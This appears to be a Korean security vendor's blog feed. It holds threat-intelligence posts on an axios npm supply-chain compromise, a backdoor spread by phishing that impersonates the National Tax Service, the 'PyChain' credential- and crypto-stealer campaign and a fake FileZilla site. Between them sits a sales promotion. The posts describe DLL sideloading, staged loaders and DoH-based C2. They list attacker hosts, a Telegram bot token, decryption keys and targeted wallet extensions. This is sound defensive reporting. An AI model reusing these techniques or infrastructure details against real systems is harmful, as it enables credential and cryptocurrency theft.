3단계 - 시스템 내 RAT 흔적(Artifacts) 확인

운영체제별로 생성되었을 수 있는 악성 파일의 존재 여부를 점검합니다.

macOS: ls -la /Library/Caches/com.apple.act.mond
Linux: ls -la /tmp/ld.py
Windows (cmd): dir "%PROGRAMDATA%\wt.exe"

4단계 - CI/CD 파이프라인 점검

빌드 시스템 및 파이프라인 로그를 검토하여 axios@1.14.1 또는 axios@0.30.4 버전이 설치된 이력이 있는지 확인합니다. 하나라도 설치된 기록이 있다면 해당 파이프라인은 손상된 것으로 간주하고, 주입된 모든 비밀 키를 즉시 폐기해야 합니다.

대응 방안

침해가 확인되었거나 취약한 버전을 사용 중인 경우, 단순히 패키지를 삭제하는 것 이상의 강력한 복구 조치가 필요합니다.

즉각적인 버전 교체 및 고정
문제가 된 버전을 즉시 삭제하고, 안전함이 확인된 버전(1.14.0 이하)을 지정하여 재설치합니다.
임시 데이터 강제 소거
로컬 및 빌드 서버에 남은 악성 데이터 찌꺼기를 완전히 제거하기 위해 NPM 캐시를 강제로 삭제합니다.
모든 자격 증명 폐기 및 재발행
감염된 환경에서 노출되었을 가능성이 있는 모든 API 키, 클라우드 인증 토큰, 비밀번호, SSH 키, NPM 로그인 토큰을 즉시 폐기하고 새로 발급받습니다.
네트워크 차단
C2로 확인된 sfrclak[.]com 도메인 및 IP 주소(142.11.206.73)로 향하는 모든 트래픽을 차단하고, 통신 시도를 모니터링 합니다.
보안 강화 설정
향후 유사 공격을 방지하기 위해 모든 계정에 다중 인증(MFA) 설정을 의무화하고, 패키지 설치 시 악성 스크립트 실행을 막는 --ignore-scripts 옵션 사용을 정책적으로 활용할 것을 권장합니다.

이번 공격은 단순히 특정 라이브러리의 취약점을 악용한 사례를 넘어, 오픈소스 생태계의 신뢰 구조 자체를 겨냥한 고도화된 공급망 공격의 위협을 보여주는 사례라 할 수 있습니다.

특히 Axios는 수많은 패키지가 의존하는 핵심 라이브러리인 만큼 그 파급력이 매우 크며, 최근 다양한 공격 그룹이 유사한 방식으로 기밀 정보를 탈취해 금전적 이득을 취하는 사례가 급증하고 있습니다.

유출된 정보는 향후 SaaS 환경 침해나 랜섬웨어, 암호화폐 탈취 등 2차적인 대규모 보안 사고로 이어질 가능성이 높습니다.

따라서 보안 담당자분들께서는 현재 시스템의 피해 여부를 즉각 재평가하고, 손상된 환경의 복구와 더불어 향후 유사한 공급망 위협에 대응할 수 있는 다각도의 보안 체계를 구축해 주시길 당부드립니다.

참고:

https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package?e=48754805&hl=en
https://socket.dev/blog/axios-npm-package-compromised
https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan

국세청 세무조사 사칭 피싱 메일을 통해 유포 중인 백도어 악성코드

알약4 — Tue, 24 Mar 2026 19:01:45 +0900

최근 국세청 세무조사를 사칭한 피싱 메일을 통해 악성코드가 유포 중인 것으로 확인되었습니다.

공격자는 피싱 메일 내 악성 링크를 통해 국세청 세무조사 통지 화면으로 위장한 피싱 사이트로 접속하게 한 뒤 해당 페이지에서 악성파일을 다운로드하도록 유도합니다.

개요 및 유입 경로

최근 기업 담당자를 대상으로 ‘국세청 세무조사 통지’를 사칭한 피싱 메일이 유포되었습니다.

사용자가 메일 내 링크를 클릭하면 국세청을 사칭한 피싱 사이로 연결되며, 세무조사 안내 문구와 함께 [조사 명단 다운로드] 버튼을 노출하여 클릭을 유도하는 방식입니다.

[그림 1] 피싱 사이트

버튼 클릭 시 ‘기업 조사 명단’.zip’ 파일이 다운로드 되며, 압축 파일 내에는 다음과 같은 3개의 파일이 존재합니다.

기업 조사 명단.exe: 정상 서명된 Intel 그래픽 유틸리티(vulkaninfo.exe) 파일
vulkan-1.dll: 정상 실행 파일(기업 조사 명단.exe)이 실행될 때 자동으로 로드되는 악성 DLL 파일
vulkan-1.bin: 암호화된 쉘코드,백도어 페이로드,C2 설정 정보가 담긴 데이터 파일

[그림 2] 기업 조사 명단.zip 내부 파일

공격 흐름

1) DLL 사이드로딩 (Sideloading)

사용자가 ‘기업 조사 명단.exe’ 파일을 실행하면 DLL 사이드로딩 기법을 통해 동일 경로에 위치한 vulkan-1.dll 파일이 로드되어 실행됩니다.

DLL 사이드로딩(Sideloading)은  Windows의 DLL 검색 순서(DLL Search Order)를 악용하는 공격 기법입니다.
프로그램 실행 시 필요한 DLL을 찾기 위해 여러 경로를 검색하는데, 정상 프로그램과 동일한 경로내 악성 DLL 파일을 위치시켜 악성 DLL 파일이 먼저 로드되도록 조작하는 방식입니다.

2) vulkan-1.bin 파일 내부 페이로드 복호화

실행된 DLL 파일은 동일 경로의 vulkan-1.bin 파일에서 데이터를 읽어온 후, RC4를 변형한 알고리즘(Modified RC4)을 사용하여 쉘코드와 백도어 페이로드를 복호화합니다.

vulkan-1.bin 파일 내부는 크게 세 영역으로 구성되어 있습니다.

구성	크기	설명
쉘코드	3,992 bytes	암호화된 PE를 복호화하고 메모리에서 직접 로드
암호화된 백도어 DLL	291,840 bytes	변형 RC4 암호화 (키: 727e032b7352365566f69b9851)
암호화된 C2 설정값	2,696 bytes	변형 RC4 암호화 (키: 01 02 03 04 05) C2 서버 주소, 서비스명 등 포함

[표 1] vulkan-1.bin 파일 내부 구조

3) 백도어 실행 및 지속성 등록

복호화된 쉘코드가 메모리에서 직접 백도어(RAT)를 실행하며, 실행된 백도어는 C:\Program Files\Common Files\ 경로에 구성 파일들 (444.exe, vulkan-1.dll, vulkan-1.bin)을 복사하고, Microsoft Compatibility system이라는 이름으로 서비스를 등록합니다.

해당 서비스명은 Microsoft 정상 서비스와 유사하게 보이도록 의도적으로 설정한 것으로 판단되며, 이후 시스템 재부팅 시에도 444.exe 파일이 자동 실행되어 악성 DLL을 다시 로드하는 구조입니다.

vulkan-1.bin 파일 내부의 C2 설정값은 %APPDATA%\install\install.cfg 파일로도 저장되어 이후 실행 시 재로드하는 방식이며, C2 서버에서 해당 파일을 교체하는 방식으로 C2 주소를 원격에서 업데이트할 수 있습니다.

최종 페이로드(Backdoor) 주요 기능

해당 악성코드는 원격 제어,권한 상승,프로세스 인젝션 등을 수행할 수 있는 백도어로 다음과 같은 악성행위를 수행합니다.

프로세스 인젝션: 실행 중인 정상 프로세스의 메모리에 악성 코드를 삽입하여 실행하는 인젝션 기능 지원
권한 상승 및 토큰 탈취: 현재 로그온 된 다른 사용자 세션의 토큰을 탈취하여 해당 권한으로 프로세스를 실행
C2 통신: 아웃바운드 연결(리버스 쉘)과 인바운드 대기(바인드 쉘)를 모두 지원, 암호화 및 압축 라이브러리(libwebsockets, zlib)를 내장하여 외부 의존성 없이 독립적으로 동작 가능
파일 시스템 조작 및 정보 수집: 감염 시스템 내 파일 조작 및 외부 탈취가 가능하며, 프로세스,서비스 목록 등 시스템 정보 수집
RPC를 통한 내부망 횡적 이동: RPC(Remote Procedure Call, 원격 프로시저 호출)는 네트워크로 연결된 다른 컴퓨터의 기능을 원격으로 실행할 수 있게 해주는 통신 방식으로, 최초 감염 시스템을 통해 내부망의 다른 시스템으로 이동 가능
안티 디버깅 및 안티 분석: 커널 레벨에서 디버거 탐지 및 가상 환경 감지 시 블루스크린(BSOD)을 유발하여 동적 분석 무력화

공격자 서버에서 확인된 추가 파일

분석 과정에서 공격자 인프라를 조사하던 중 공격자의 서버에서 다수의 변종 파일을 발견했으며, 다른 언어로 제작된 피싱 사이트와 피싱 메일도 확인되었습니다.

해당 피싱 사이트는 이번 공격과 동일한 방식으로 말레이시아 국세청(LHDN)을 사칭한 것으로 확인되었습니다.

[그림 3] 말레이시아 국세청 사칭 피싱 사이트

피싱 메일은 인도 공영어 중의 하나 인 힌디어로 작성되었으며, 인도 법원 통지 내용으로 인도 정부 소득세청으로 위장했습니다.

[그림 4] 힌디어 로 제작된 피싱 메일

공격자 서버에서 발견된 변종 파일들을 분석한 결과 최초 공격이 작년 12월 중순부터 시작되어 최근까지도 업데이트를 진행하며 지속적으로 공격을 진행중인 것으로 파악됩니다.

파일명	마지막 수정 일시 (LastModified)
1032451.zip	2025-12-15 06:19:30
1045781.zip	2025-12-15 06:19:32
12025521.zip	2025-12-16 00:43:10
0305.zip	2026-03-04 17:43:29
2026 सूचना.zip	2026-03-05 14:17:31
1202154.rar	2026-03-08 14:17:02
51055334.zip	2026-03-09 02:24:28
88999668/51055334 (1).zip	2026-03-09 09:15:13
5102320.zip	2026-03-09 09:28:15
510553345.zip	2026-03-10 03:32:05
5105533456.zip	2026-03-10 03:44:04
510553888.zip	2026-03-10 06:25:57
공지사항.rar	2026-03-11 06:24:36
점검 대상 명단 (2).zip	2026-03-16 01:36:35
기업 조사 명단.zip	2026-03-17 03:45:05
List of Companies Under Investigation(1).zip	2026-03-17 18:59:45
기업 명단3.zip	2026-03-18 20:04:14
기업 명단5.zip	2026-03-19 05:24:47

[표 2] 공격자 서버에 업로드 된 변종 파일 리스트

로더로 사용된 정상 파일
- nvgpu_x64.exe
- SandboxieCrypto.exe
- 444.exe
- クリックして閲覧.exe
DLL 사이드로딩으로 사용된 악성 파일
- nvml.dll
- SbieDll.dll
- vulkan-1.dll
지속성유지를 위해 사용된 작업 스케쥴러명
- Microsoft Compatibility system
-.NET Framework NGEN v4.0.30417
-WindowsSafe
유포에 사용된 파일명
- 0305.zip (27.124.45.153_压缩_680.exe)
- 2026 सूचना.zip (2026 सूचना.exe)
- 032451.zip (1032451.exe)
- 1045781.zip (1045781.exe)
- 1202154.rar (Court indictment.exe)
- 5102320.zip (51055334.exe)
- 12025521.zip (12025521.exe)
- 51055334.zip (51055334.exe)
- 510553345.zip (DpcpAJ.exe)
- 5105533456.zip (118.107.43.25.exe)
- List of Companies Under Investigation(1).zip (Court indictment.exe)
- 공지사항.rar (DpcpAJ.exe)
- 기업 명단3.zip (기업 명단.exe)
- 기업 명단5.zip (기업 명단5.exe)
- 기업 조사 명단.zip (기업 조사 명단.exe)
- 점검 대상 명단 (2).zip (조회.exe)
- List of Companies.zip (List of Companies.exe)
- 기업 조사 대상 명단.zip (기업 조사 대상 명단.exe)

이는 공격 대상이 국내에 국한되지 않고 아시아 내 다른 국가까지 포함하고 있음을 시사하며, 이번 공격이 특정 국가를 대상으로 한 일회성 공격이 아닌 다수의 국가를 겨냥한 광범위한 캠페인일 가능성이 높습니다.

공격 특징

사회공학적 공격
국세청을 사칭하여 '세무조사'라는 심리적 압박 소재로 사용자의 파일 실행을 유도합니다. 취약점 악용 없이 사용자가 직접 악성 파일을 실행하도록 설계된 전형적인 사회공학적 기법입니다.
정상 소프트웨어 악용
Intel의 정상 서명된 프로그램을 통해 함께 배포된 악성 DLL파일이 실행되는 방식으로 정상 파일을 악용해 보안 솔루션의 탐지를 우회합니다.
위장을 통한 지속성 유지
Microsoft Compatibility system이라는 서비스명과 C:\Program Files\Common Files\ 경로를 사용하여 정상 시스템 구성요소로 위장합니다. C2 주소 원격 업데이트 구조를 통해 특정 IP 차단에도 유연하게 대응 가능합니다.
지속적/다국가 대상 공격
공격자 서버 분석 결과, 최초 공격은 작년 12월 중순부터 시작되어 현재까지 지속되고 있으며, 특정 국가를 대상으로 한 일회성 공격이 아닌 다수의 국가를 겨냥한 지속적인 캠페인으로 판단됩니다.

기업 사용자를 타겟으로 한 이번 국세청 세무조사 사칭 피싱 공격은 감염 시 원격코드 실행 및 내부망 확산 등 광범위한 피해를 초래할 수 있습니다. 특히 공격자가 지속적으로 변종파일을 업데이트하며 공격을 이어가고 있는 만큼, 기업 보안담당자와 사용자의 각별한 주의가 필요합니다.

국세청에서는 ‘세무조사’와 관련된 메일을 발송하지 않는다는 점을 명심하시고, 의심스러운 메일의 링크 클릭이나 출처가 불분명한 파일을 실행하지 않도록 보안 수칙을 준수하시어 피해를 예방하시기 바랍니다.

IoC

Indicator	Type	Description	Detection Name
9FD5920FE1FE407DC8BA6871550CA012	MD5	DLL 파일	Backdoor.SideLoad.A
B59F73817733D2986425B34FD28A1DC4	MD5	BIN 파일	Trojan.BIN.Encoded
hxxps://s-ac****.io	DOMAIN	피싱 사이트

Re:START 신규 프로모션 - 기업 보안, 지금 점검하고 가장 좋은 조건으로 도입하세요!

알약5 — Thu, 19 Mar 2026 14:00:47 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

랜섬웨어, 악성코드, 내부 문서 유출, 생성형 AI 도입에 따른 보안 위험까지. 기업을 둘러싼 보안 위협은 그 범위와 속도가 날로 빠르게 진화하고 있습니다.

'언젠가는 도입해야지'라고 미뤄왔던 보안 솔루션, 지금이 가장 좋은 조건으로 시작할 수 있는 타이밍입니다!

지금 도입하세요, 위협은 기다려주지 않습니다

오늘날 기업이 직면한 보안 위협은 단순한 바이러스 감염 수준을 훨씬 넘어섰습니다.

랜섬웨어 - 파일을 암호화하고 복구 대가로 금전을 요구
악성코드 - 내부 시스템에 침투해 장기간 잠복하며 정보 수집
내부 문서 유출 - 퇴직자·내부자에 의한 핵심 자료 유출
생성형 AI 도입 시 보안 위험 - 업무 데이터의 외부 AI 유출 위험

보안 투자를 미루는 사이, 단 한 번의 침해 사고가 수년간 쌓아온 고객 신뢰와 사업 기반을 무너뜨릴 수 있습니다. 사고가 난 후 도입하는 보안은 언제나 더 많은 비용과 더 큰 피해를 동반합니다.

보안은 단순한 예방이 아닙니다. 기업 경쟁력과 신뢰를 지키는 핵심 전략입니다.

Re:START 프로모션이란?

Re:START 프로모션은 기업의 보안 도입 진입 장벽을 낮추고, 체계적인 보안 환경 구축을 지원하기 위해 이스트시큐리가 eGISEC 2026 부스 방문·상담 고객을 대상으로 진행한 신규 도입 특별 혜택입니다.

현장에서 3일 한정으로 운영 예정이었으나, 전시 기간 중 방문하지 못한 고객사의 높은 관심과 요청에 힘입어 온라인으로 확대 연장하게 되었습니다! 이제 기간 내 신규 및 윈백 고객이라면 누구나 동일한 혜택을 받으실 수 있습니다.

▪️ 프로모션 기간 : 2026년 3월 18일 ~ 4월 30일

▪️ 프로모션 대상

- 이스트시큐리티 제품을 처음 도입하는 신규 기업 고객

- 과거 거래 이력이 있고 재구매를 검토 중인 기업

▪️신청하기 : https://forms.office.com/r/QhXhQYKf2X

Re:START 프로모션 혜택 안내

혜택 1 — Alan Works 계정 무료 제공

알약 / 알툴즈 / 문서중앙화 신규 도입 시, 도입 금액 200만원당 Alan Works 계정 1개(1년 이용권) 를 무료로 제공합니다.

보안 솔루션 도입과 동시에, 기업용 안전한 멀티 LLM 플랫폼인 Alan Works 까지 확보할 수 있는 기회입니다. AI 업무 도구를 도입하고 싶지만 데이터 보안이 걱정되셨던 조직이라면 더욱 주목할 만한 혜택입니다.

혜택 2 — 구매 금액 구간별 프리미엄 경품

구매 금액에 따라 단계별 프리미엄 경품을 제공합니다. 자세한 경품 내역은 아래 이미지를 통해 확인하세요.

이런 조직이라면, 지금 바로 신청하세요!

▪️ 보안 솔루션 도입을 고민해왔지만 비용·복잡성이 부담스러웠던 조직

▪️ eGISEC 현장을 방문하지 못했지만 혜택을 받고 싶은 조직

▪️ 랜섬웨어·악성코드 대응 체계를 새롭게 구축하려는 조직

▪️ 생성형 AI 도입과 함께 데이터 보안을 강화하고 싶은 조직

▪️ 기존 제품에 새로운 보안 솔루션을 추가 확장하려는 조직

기업 보안, 가장 좋은 타이밍은 바로 지금입니다. Re:START 프로모션 기간 동안 가장 유리한 조건으로 이스트시큐리티의 보안 솔루션을 도입하고, 체계적인 보안 환경을 갖춰보세요.

프로모션 기간은 4월 30일까지입니다. 기회를 놓치지 마세요!

베트남 위협행위자의 PyChain 캠페인 : 저작권 경고 이메일로 시작한 글로벌 피싱의 기술적 진화

알약4 — Tue, 17 Mar 2026 10:54:44 +0900

“귀하의 저작권 침해가 확인되었습니다.” 한 줄로 시작되는 이메일이 최근 기업 담당자들의 수신함에 자주 들어오고 있습니다.

겉으로는 법적 경고처럼 보이지만, 실제로는 피싱 공격의 출발점입니다. 이스트시큐리티 대응센터(ESRC)는 이 캠페인을 1년 넘게 추적해 왔으며, 그 과정에서 공격 방식이 여러 단계로 바뀌는 것을 확인했습니다.

초기에는 GitHub, Dropbox 같은 신뢰받는 서비스를 이용해 악성 모듈을 내려받는 방식으로 시작되었지만, 이후 정상 서명된 실행 파일을 이용한 DLL 사이드로딩, Telegram Bot과 URL 단축 서비스, paste 사이트를 거치는 다단계 페이로드 체인이 등장했습니다. 유포 주제도 저작권 및 법률 내용에서 비즈니스 제안, 채용, AI 영상 도구 등으로 넓어졌고, 한국어와 영어를 넘어 30개 이상 언어로 작성된 피싱 파일이 수집되었습니다.

이 캠페인의 배후는 베트남 국가의 위협행위자로 이스트시큐리티는 해당 위협행위자를 ‘LoneNone’으로, Python 과 다단계 C2 체인의 특징을 바탕으로 ‘PyChain’ 캠페인으로 명명했습니다.

[그림 1] PyChain 캠페인 공격 타겟 국가 분포

해당 포스트에서는 LoneNone 위협행위자의 최근 위협사례를 분석하고, PyChain 캠페인의 진화 과정을 7개 Operation로 분류하고 기술적 특성을 정리하였습니다.

최근 위협 사례 분석

1) 개요 및 실행 흐름

최근 발견된 동일 위협행위자의 위협 이메일은 "저작권 침해" 관련 내용을 여전히 사용하고 있습니다. 이메일 본문에는 위반 내용 확인·법적 조치 안내 등을 이유로 PDF 또는 문서 링크가 포함되어 있으며, 수신자가 해당 링크를 클릭하면 외부로부터 ZIP 파일이 다운로드 됩니다. 사용자가 다운로드한 ZIP을 압축 해제한 뒤 내부에 포함된 실행 파일(EXE 등)을 직접 실행함으로써 공격이 시작됩니다.

즉, 초기 침투는 이메일 → 링크 클릭 → ZIP 다운로드 → 압축 해제 및 내부 파일 실행의 단계로 이루어지며, 사용자 실행 시점 이후에는 DLL 사이드로딩을 통한 1차 로더 실행, C2에서의 2차 페이로드 다운로드, Telegram 및 urlvanish.com을 이용한 2차 C2 통신이 이어집니다.

[그림 2] 엔터회사 사칭 이메일

[그림 3] 공격 흐름도

2) 상세 코드 분석

2-1) 초기 침투 파일

피싱 이메일을 통해 다운로드 받은 ZIP파일의 파일 목록은 다음과 같고, 조사에서 확인된 결과.exe 파일을 제외한 모든 파일은 숨김 옵션이 설정되어 있습니다.

[그림 4] ZIP 파일 내부 파일 목록

압축 파일에 포함된 “조사에서 확인된 결과.exe” 파일은 PDF 문서로 위장한 EXE 파일로, 정상 Adobe 파일(ADNotificationManager.exe)입니다. 해당 파일 실행 시 동일 경로에 숨겨진 DLL이 사이드로딩으로 동작됩니다.

[그림 5] “ 조사에서 확인된 결과.exe” 파일 정보

로드된 DLL중 urlmon.dll은 다음과 같은 명령어를 통해 “Invoice.pdf” 파일을 다운로드를 진행합니다. 다운로드된 파일은 암호화된 RAR 압축 파일이며, “부가가치세 영수증.jpg”(정상 WinRAR.exe) 파일을 이용해서 “C:\Users\Public”폴더에 압축을 해제합니다. 이때 압축 해제 암호는 “GSE3yM1tHno0DdW9BmIsSW9pnINo36ZZ” 이며, 이후 “Invoice.pdf”, “부가가치세 영수증.jpg” 두 파일을 삭제해 흔적을 지우고, “Invoice.pdf” 내 “svchost.exe” 파일을 이용해 “py.ico” 파일을 실행합니다.

[그림 6] urlmon.dll 로드 시 실행되는 명령어

[그림 7] “ 부가가치세 영수증.jpg” 파일 정보

“Invoice.pdf” 파일은 Python 버전 3.10의 런타임 및 악성 스크립트를 포함하고 있으며, 정상 “python.exe” 파일을 “svchost.exe” 로 위장하여 py.ico(악성 스크립트)를 실행합니다. 실행 시 “MRB_2_NEW_VER_BOT” 값을 실행 인자로 사용합니다.

[그림 8] Invoice.pdf 압축해제 이후 파일 목록

2.2) 추가 다운로드 파일

py.ico 파일은 python 난독화 스크립트로, 실행 시 다음과 같은 흐름으로 코드가 실행됩니다.

실행 흐름
Base85 → BZ2 압축 해제 → Zlib 압축 해제 → Marshal 로드 → 생성된 바이트 코드 실행

[그림 9] py.ico 코드 일부

바이트 코드가 실행되면, 우선 실행 인자로 전달받은 값(“MRB_2_NEW_VER_BOT”)을 Telegram Bot ID로 설정하여 Request 요청(“t.me/MRB_2_NEW_VER_BOT”)을 진행합니다. 해당 페이지에 접근하게 되면 HTML 메타 태그 “og:description“의 content 값을 파싱하여 특정ID값을 가져오게 되며, 해당 ID를 통해 urlvanish.com/{ID}을 접근 후 다음 주소로 리다이렉션됩니다.

리다이렉션 URL:
hxxps://mongky68.godohosting[.]com/detail/nonlocal/23summer/PA/PA?referer=urlvanish.com%2Ffe44f1ba

[그림 10] Telegram 에서 수신한 ID

2.3) fe44f1ba 분석

C2 서버에서 추가로 다운받은 fe44f1ba 파일은 py.ico 파일과 동일한 방식으로 난독화가 되어 있는 python 스크립트이고, 최종적으로 생성된 바이트 코드를 실행합니다.

실행되는 바이트 코드의 문자열을 추출하여 확인한 결과, 브라우저 자격 증명 관련 정보와 암호화폐 지갑을 수집하고, C2 서버로 전송합니다. 이후 추가 파일을 다운로드하고 실행해 추가 데이터 유출을 하는 것으로 추정됩니다. 해당 파일의 문자열 추출 정보는 다음과 같습니다.

항목	상세 문자열	설명
Telegram Bot Token	7755709066:AAExjVy6cxqr-6wprm2w3gqyAXSL7LfmwEE	Telegram API 통신을 위한 고유 토큰
Telegram Channel	-1003147990191, -1002804802878, -1003188277781	로그 수집, 감염 알림, 데이터 유출 채널 ID
C2 Server Host	hxxp://mongky68.godohosting[.]com	악성파일 유포지 (국내 웹 호스팅 서비스 악용)
추가 다운로드 Path	/detail/nonlocal/23summer/ABE, /detail/nonlocal/23summer/clip, /detail/nonlocal/23summer/PA/pure	추가 페이로드 다운로드 경로

[표 1] C2 통신 관련 문자열

분류	상세 문자열	탈취 정보
주요 브라우저	Naver Whale, Chrome, Edge, Brave, Firefox, Opera, Opera GX, Opera Crypto, Vivaldi	Login Data, Cookies, Web Data, HIstory
기타 브라우저	Thorium, Iridium, Epic, Dragon, CocCoc, Yandex, Slimjet, U-R Browser, Arc, Aloha, CryptoTab, Cent, Chedot, 360Browser
시스템 정보	Local State, os_crypt, encrypted_key, login_db, cookie_db

[표 2] 브라우저 관련 문자열

분류	대상 도메인 (URL)
국내 거래소	`upbit.com`, `korbit.co.kr`, `coinone.co.kr`, `gopax.co.kr`
해외 거래소	`binance.com`, `coinbase.com`, `okx.com`, `bybit.com`, `bitget.com`, `mexc.com`, `htx.com`, `kucoin.com`, `kraken.com`, `bitfinex.com`, `bingx.com`, `bitmart.com`, `lbank.com`, `xt.com`, `bitunix.com`, `probit.com`, `huobi.com`
지갑	`exodus.com`, `hyperliquid.xyz`, `electrum.org`, `coinomi.co.nl`, `bitgo.com`, `paypal.com`, `crypto.com`, `nami.exchange`, `whitebit.com`, `gate.com`
광고 계정	`ads.google.com`, `business.facebook.com`, `adsmanager.facebook.com`

[표 3] 암호화폐 관련 문자열

지갑 명칭	확장 프로그램 ID
MetaMask	`nkbihfbeogaeaoehlefnkodbefgpgknn`, `djclckkglechooblngghdinmeemkbgci`
Ronin Wallet	`fnjhmkhhmkbjkkabndcnnogagogbneec`, `kjmoohlgokccodicjjfebfomlbljgfhk`
TronLink	`ibnejdfjmmkpcnlpebklmnkoeoihofec`
Binance Wallet	`fhbohimaelbohpjbbldcngcnapndodjp`
OKX Wallet	`mcohilncbfahbmgdjkbpemcciiolgcge`
Phantom / Solflare	`bfnaelmomeimhlpmgjnjophhpkkoljpa`, `bhhhlbepdkbapadjdnnojkbgioiodbic`

[표 4] 암호화폐 지갑 확장 프로그램 관련 문자열

위협의 진화 및 특성 분석

2024년 말부터 2026년 1월까지 관찰된 캠페인은 유포 채널에 따라 이메일 기반 5종(Email case 1~5), 웹 기반 2종(Web case1~2) 으로 나뉘며, [표 5] Operations 분류에서 7개 Operation의 활동 기간 및 Activity 수와 대표적인 특징을 확인할 수 있습니다.

Operation	유형	활동 기간	Activity 수	특징
Email case 1	이메일	2024년	48	형상관리(GitHub/GitLab) 활용
Email case 2	이메일	2025/01 ~ 03	67	msimg32.dll 사용
Email case 3	이메일	2025/05 ~ 09	62	version.dll 사용
Email case 4	이메일	2025/05 ~ 12	138	AppvIsvSubsystems64.dll 사용
Email case 5	이메일	2025/11 ~ 2026/01	159	urlmon.dll 사용
Web case 1	웹	2024년	19	AI 영상 도구 위장
Web case 2	웹	2025/03 ~ 04	32	CapCut/AICore 위장

[표 5] Operations 분류

[그림 11] 유포 타임라인

각 Operation의 기술적 특성을 정량화하기 위해 형상관리도구, 자체인프라, 클라우드, 파이썬이용, 파이썬동봉, 파이썬다운로드, 사이드로딩 7개 항목으로 특성 벡터를 정의했으며, [표 6]에 Operation별 Vector 체크리스트에 Operation별 사용(○)·미사용(×)·일부 변종만 해당(△) 여부를 정리했습니다.

형상관리도구: GitHub/GitLab/Bitbucket, Pastebin, paste.rs 등 정상 개발/코드·텍스트 호스팅 플랫폼을 C2·페이로드 호스팅에 활용
자체 인프라: 공격자가 직접 구축·관리하는 C2 서버 사용
클라우드: Dropbox, MediaFire 등 퍼블릭 클라우드 스토리지 활용
파이썬 이용: Python 기반 악성 스크립트 사용
파이썬 동봉: Python 런타임 및 스크립트를 ZIP 내부에 직접 포함(파이썬 버전 3.10)
파이썬 다운로드: 외부에서 Python 패키지 동적 다운로드
사이드로딩: DLL 사이드로딩 기법 사용

이 벡터를 보면 파이썬 패키지를 이용한 공격 방식은 7개 Operation 전반에서 공통으로 유지되고, 형상관리/클라우드/C2/DLL 사이드로딩/파일 동봉/다운로드 조합만 시기별로 바뀌고 있음을 알 수 있습니다.

즉 LoneNone은 핵심 공격 방식은 유지한 채, 인프라/로더/페이로드 전달 방식만 단계적으로 진화시켜 온 것으로 해석할 수 있습니다.

범례: O 사용, X 미사용, △ 일부 변종에서만 관찰

특성	Email case 1	Email case 2	Email case 3	Email case 4	Email case 5	Web case 1	Web case 1
형상관리도구	O	X	O	X	X	△	X
자체인프라	O	O	X	O	O	O	O
클라우드	O	X	X	X	X	X	X
파이썬이용	O	O	O	O	O	△	O
파이썬동봉	X	O	O	O	X	X	O
파이썬다운로드	O	X	X	X	O	△	X
사이드로딩	X	O	O	O	O	X	X

[ 표 6] Operation별 Vector 체크리스트

해당 포스트에서는 PyChain 캠페인의 기술적 진화 과정과 Operation별 특성을 정리했습니다.

위협의 진화 및 특성과 결론 등 상세 내용은 인텔리전스 보고서로 보관 중이며, 본 포스팅에서는 추가로 공개하지 않습니다.

해당 내용에 대한 문의나 협력 요청이 있으시면 esrc@estsecurity.com으로 연락해 주시기 바랍니다.

가짜 FileZilla 사이트를 이용한 악성코드 유포

알약4 — Fri, 13 Mar 2026 14:38:06 +0900

[이미지] 생성형 AI 제작

최근 오픈소스 FTP 클라이언트인 FileZilla의 공식사이트를 위장한 가짜 웹사이트를 통해 악성코드를 유포하는 공격이 확인되었습니다.

공격자는 정상 FileZilla 프로그램에 악성 DLL 파일을 포함하여 배포하였으며, 이로 인해 사용자가 프로그램을 실행할 경우 정상적인 동작과 더불어 악성코드가 함께 실행되는 방식입니다.

유포 방식 및 공격 흐름

공격자는 FileZilla 공식 사이트의 디자인을 정교하게 복제한 가짜 웹사이트를 운영하며, 악성 DLL 파일이 포함된 설치 파일을 배포했습니다.

[그림 1] 가짜 FileZilla 사이트

분석 과정에서 확인된 샘플은 배포 형태에 따라 두 가지 유형으로 구분됩니다.

Case1 – 악성 DLL 파일이 포함된 압축파일
초기 공격에서는 FileZilla 3.69.5 Portable 버전에 악성 DLL(version.dll) 파일을 추가한 압축 파일 형태로 배포되었습니다.

[그림 2] 악성 DLL 파일이 추가된 FileZilla 압축파일

사용자가 압축을 해제하고 FileZilla 파일을 실행하면, 윈도우의 DLL 로딩 우선순위를 악용한 사이드로딩(Side-loading) 기법에 의해 악성 코드가 함께 실행됩니다.

DLL 사이드로딩(Sideloading)은 Windows의 DLL 검색 순서(DLL Search Order)를 악용하는 공격 기법입니다.

프로그램 실행 시 필요한 DLL을 찾기 위해 여러 경로를 검색하는데, 정상 프로그램과 동일한 경로내 악성 DLL 파일을 위치시켜 악성 DLL 파일이 먼저 로드되도록 조작하는 방식입니다.

Case2 – 악성 DLL 파일이 삽입된 실행 파일(EXE)
최근에는 정상 FileZilla 설치 프로그램과 악성 DLL을 하나로 합친 단일 실행 파일 형태로 유포되었습니다.

[그림 3] 악성 설치파일(좌)과 정상 설치파일(우) 비교

해당 파일을 실행하면 정상적인 설치 과정이 진행됨과 동시에, 악성 DLL이 설치 경로에 생성(Drop)되고, 이후 FileZilla 실행 시 악성 DLL이 로드되어 실행되는 방식입니다.

상세 분석

① 다단계 로더(Multi-stage Loader) 구조

실행된 악성 DLL 파일은 로더(Loader) 역할을 수행하며 보안 탐지를 피하기 위해 다단계 로더(Multi-stage Loader ) 구조를 거치게 됩니다.

각 단계의 로더는 메모리 상에서 암호화된 다음 단계 데이터를 복호화하여 로드하며, 최종적으로 RAT(Remote Access Trojan) 페이로드를 실행합니다.

FileZilla 실행 → 악성 version.dll 로드 → Stage2 Loader → Stage3 Loader → Stage4 Loader → 페이로드(RAT) 실행

② DoH(DNS-over-HTTPS) 기반 C2 통신

공격자는 네트워크 보안 장비의 DNS 기반 모니터링을 우회하기 위해 DoH 기술을 활용했습니다.

DoH 기술은 DNS 쿼리를 암호화된 HTTPS 트래픽으로 전송하는 기술로 악성 로더는Cloudflare의 공용 리졸버인 hxxps://1.1.1.1/dns-query에 HTTPS 요청을 전송하여 C2 도메인인 welcome.supp0v3[.]com의 IP 주소를 확인합니다.

